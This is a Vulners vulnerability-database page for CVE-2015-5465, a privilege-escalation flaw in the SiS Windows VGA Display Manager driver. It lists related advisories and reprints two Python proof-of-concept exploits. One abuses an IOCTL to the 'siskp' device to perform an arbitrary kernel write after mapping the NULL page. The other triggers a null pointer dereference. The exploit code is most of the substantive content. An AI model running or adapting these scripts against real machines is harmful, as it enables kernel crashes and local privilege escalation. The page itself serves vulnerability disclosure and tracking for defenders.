Vulners
Lucene search
SiS Windows VGA Display Manager 6.14.10.3930 Multiple Privilege Escalation
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC | 1 Sep 201500:00 | – | zdt |
 | Multiple Elevation of Privilege Vulnerabilities in Silicon Integrated Systems WindowsXP Display Manager | 17 Sep 201500:00 | – | cnvd |
 | CVE-2015-5465 | 16 Sep 201518:00 | – | cve |
 | CVE-2015-5465 | 16 Sep 201518:00 | – | cvelist |
 | SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC) | 1 Sep 201500:00 | – | exploitdb |
 | EUVD-2015-5421 | 7 Oct 202500:30 | – | euvd |
 | SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC) | 1 Sep 201500:00 | – | exploitpack |
 | SiS Windows VGA Display Manager Multiple Privilege Escalation | 1 Sep 201500:00 | – | korelogic |
 | CVE-2015-5465 | 16 Sep 201518:59 | – | nvd |
 | Code injection | 16 Sep 201518:59 | – | prion |
10
# Arbitrary Write (Windows XP)
from sys import exit
from ctypes import *
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "siskp"
code = 0x96002404
inlen = 0xe6b6
outlen = 0x0
inbuf = 0x1
outbuf = 0xffff0000
inBufMem = "\x90"*inlen
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x
1000|0x2000,0x40)
WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0)))
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,o
utbuf,outlen)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
and
# Null Pointer Dereference (Windows XP/7)
from sys import exit
from ctypes import *
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "siskp"
code = 0x96002400
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,0x0,0x0
,0x0)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Sep 2015 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.00608